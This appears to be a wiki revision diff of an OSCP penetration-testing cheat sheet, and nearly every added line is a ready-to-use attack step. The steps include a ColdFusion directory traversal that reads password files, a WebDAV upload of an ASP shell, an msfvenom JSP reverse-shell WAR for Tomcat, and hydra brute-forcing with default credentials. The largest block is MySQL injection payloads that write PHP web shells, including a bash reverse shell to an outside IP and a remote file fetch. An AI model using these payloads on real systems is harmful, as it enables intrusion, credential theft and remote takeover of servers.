Outils d'utilisateurs

Outils du Site


oscp_survival_guide

Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

Lien vers cette vue

oscp_survival_guide [2020/11/25 14:16]
M0N5T3R
oscp_survival_guide [2020/11/25 14:39] (Version actuelle)
M0N5T3R
Ligne 2754: Ligne 2754:
 https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh
  
 +RealVNC
 +RealVNC : https://www.exploit-db.com/exploits/36932
 +Edit, BIND_ADDR into mine and BIND_PORT into 4444
 +root@kali:~/PWK$python RealVNC-exploit-36932.py
 +[] Please input an IP address to pwn: 10.11.1.227
 +[] Hello From Server: RFB 003.008
 +Ctrl+Alt+Shift+Del will be vmware’s ctrl+alt+del
 +
 +
 +XAMPP
 +XAMPP cred(wampp/xampp)
          
 +
 +ColdFusion (Vulnerable)
 +Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl
 +LFI(passowrd file) : http://server/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/ColdFusion8/lib/password.propertiesen
 +(either – neo-security.xml and password.properties)
 +ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
 +exploit/windows/http/coldfusion_fckeditor – only for 8.0.1
 +
 +Webdav
 +WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.229
 +auxiliary : webdav_test
 +1 cadaver http://10.11.x.x/webdav/
 +Uploading shells.txt to `shells.txt’
 +1 dav:> put shells.txt
 +2 dav:> copy shells.txt shells.asp;.txt
 +
 +PHPAdmin 
 +http://.../phpmyadmin
 +db and password located @ /etc/phpmyadmin/config-db.php and default cred can be; (root/blank)(pma/blank)
 +You can also bruteforce by sh hydra 10.10.10.43 -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"
 +
 +Tomcat 
 +Default cred for Tomcat;“tomcat/tomcat” and check out /manager console by navigating to browsereg. http://10.11.1.209:8080/manager/html
 +You can upload reverse shell on manager consor ; msfvenom jsp or war file
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.37 LPORT=443 -f war > shell.war
 +jar -xvf shell.war
 +
 +
 +Windows IIS 
 +Getting Windows 0S and version details through Nikto / Nmap Scanning.
 +auxiliary/admin/http/iis_auth_bypass
 +
 +mysql
 +nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306
 +MySQL login : sh mysql -h 192.168.88.152 -D wordpress -u root -p plbkac
 +MySQL Spawning Reverse shell(linux) : union select ""<?php exec(\""/bin/bash -c \'bash -i >& /dev/tcp/159.203.242.172/1999 0>&1\'\"");"" INTO OUTFILE '/var/www/ecustomers/samshell4.php'
 +UPLOAD A FILE :
 +' union select ""<?php file_put_contents(\""root\"", file_get_contents(\""http://attack.samsclass.info/root\"")); ?>"" INTO OUTFILE '/var/www/ecustomers/samget2.php' #
 +OPEN A PHP SHELL :
 +' union select ""<?php system($_REQUEST['cmd']); ?>"" INTO OUTFILE 
 +
 +
 +ShellShock
 +nikto scan results; shows shellshock on /cgi-bin; use 34900.py
 +root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost=192.168.88.155 lhost=192.168.88.157 lport=1234
 +[!] Started reverse shell handler
 +[-] Trying exploit on : /cgi-bin/status"
 +
 +Squid 
 +proxy scanner/http/squid_pivot_scanning
 +RHOST : Target
 +RANGE : Target
 +RPORT : Squid port
 +msf auxiliary(scanner/http/squid_pivot_scanning) > run
 +[+] [192.168.88.155] 192.168.88.155 is alive but 21 is CLOSED
 +[+] [192.168.88.155] 192.168.88.155:80 seems OPEN
 +if the target uses squid proxy via 3128 port, use nikto with that proxy setting 
 +nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128"
 +
 +RFI(Remote File Inclusion) 
 +browse.php?file=http://10.11.0.42/index.html
 +browse.php?file=ftp://10.11.0.42/index.html
 +browse.php?expect://ls
 +
 +Uploading malicious .php file on database 
 +http://hackingandsecurity.blogspot.com/2017/08/proj-12-exploiting-php-vulnerabilities.html
 +
 </code> </code>
oscp_survival_guide.txt · Dernière modification: 2020/11/25 14:39 par M0N5T3R